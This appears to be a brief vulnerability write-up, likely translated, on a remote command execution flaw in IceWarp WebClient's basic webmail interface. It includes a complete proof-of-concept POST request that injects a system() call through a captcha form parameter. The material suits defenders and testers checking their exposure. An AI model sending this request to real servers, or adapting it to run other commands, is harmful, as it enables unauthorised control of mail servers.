Icewarp Webclient Basic Remote Command Execution Vulnerability
Icewarp Webclient Basic Remote Command Execution Vulnerability
IceWarp WebClient basic remote command execution vulnerability
Vulnerability Description
IceWarp WebClient has a remote command execution vulnerability, and an attacker can construct a special request to execute remote commands.
Vulnerability Impact
IceWarp WebClient
Network surveying and mapping
Vulnerability reappears
The login page is as follows
The vulnerability request package is
POST /webmail/basic/ HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
Cookie: use_cookies=1
Content-Length: 43
_dlg[captcha][target]=system(\'ipconfig\')\
This post is licensed under CC BY 4.0 by the author.